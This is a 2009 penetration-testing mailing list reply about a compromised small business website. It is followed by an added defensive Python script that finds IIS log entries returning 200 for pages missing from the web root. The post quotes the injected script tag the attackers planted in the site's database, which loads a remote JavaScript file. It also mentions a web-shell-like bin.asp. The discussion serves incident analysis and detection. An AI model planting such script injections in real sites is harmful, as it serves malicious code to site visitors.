Penetration Testing mailing list archives
RE: Smells Funny: Looking for help against Chinese Hacking Team
From: northbayts () hushmail com
Date: Sun, 11 Jan 2009 16:47:49 -0800
> Does anyone else get the same sort of creepy-crawly feeling? When I look at the way it was written, and the obvious vulnerabilities/clues given, it smells too good to be true.
Nah, it's true. This tag was inserted into his sql db. text fields: <script>-id=http--dbios.org/h.js></script>. Dozens of his pages came up on google at that time, they seem to be clean now...
> Or is this level of innate incompetence the norm?
Yes. It was easy enough to obtain the admin credentials due to a coding error on his info request page. I suspect there were many more coding errors and who knows what was added to the box in its vulnerable state.
Some more info from the owner...
Basically we have a request for a non-existent page. Instead of returning a 404, the IIS log reports a 200, usually from a Chinese IP address that is not among the 32,000 I currently ban. I can find the page on the file system in some cases but it's usually not anywhere below the web root. It has in one case been in the Recycler. Once the page is renamed from bin.asp -> bin.asp_hacked then the requests stop soon thereafter. One more feature is that the attack requests are viewable in Internet Explorer.
Cheers,
n00b_pt
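
One way to hunt for the symptom the owner describes (a 200 in the IIS log for a page that does not exist under the web root), as an added example that is not part of the original post: it parses W3C extended log lines and reports every URI answered with 200 that is missing from an inventory of real files. The log lines, IP addresses, the `/images/` path and the inventory are constructed, and `parse_w3c` and `phantom_hits` are hypothetical names.

```python
from collections import defaultdict

# Constructed sample in IIS W3C extended format (documentation IP ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-01-10 03:12:44 203.0.113.7 GET /default.asp - 200
2009-01-10 03:12:51 203.0.113.7 POST /images/bin.asp - 200
2009-01-10 03:13:02 198.51.100.23 GET /nosuchpage.asp - 404
2009-01-10 03:15:40 203.0.113.9 POST /images/bin.asp - 200
2009-01-10 03:16:05 192.0.2.14 GET /Contact.asp - 200
"""

# Constructed inventory: paths of files that really exist under the web root.
KNOWN_FILES = {"/default.asp", "/contact.asp", "/inforequest.asp"}


def parse_w3c(text):
    """Yield one dict per request, using the most recent #Fields: directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or corrupt rows
                yield dict(zip(fields, values))


def phantom_hits(text, known_files):
    """Map each URI served with 200 but absent from the inventory to its client IPs."""
    known = {p.lower() for p in known_files}  # IIS paths are case-insensitive
    hits = defaultdict(set)
    for row in parse_w3c(text):
        stem = row["cs-uri-stem"].lower()
        if row["sc-status"] == "200" and stem not in known:
            hits[stem].add(row["c-ip"])
    return {uri: sorted(ips) for uri, ips in hits.items()}


if __name__ == "__main__":
    for uri, ips in phantom_hits(SAMPLE_LOG, KNOWN_FILES).items():
        print(f"{uri}: 200 with no file under web root, clients {ips}")
```

A URI flagged this way is served from somewhere other than the inventoried web root, which matches the owner's report of finding the file outside it.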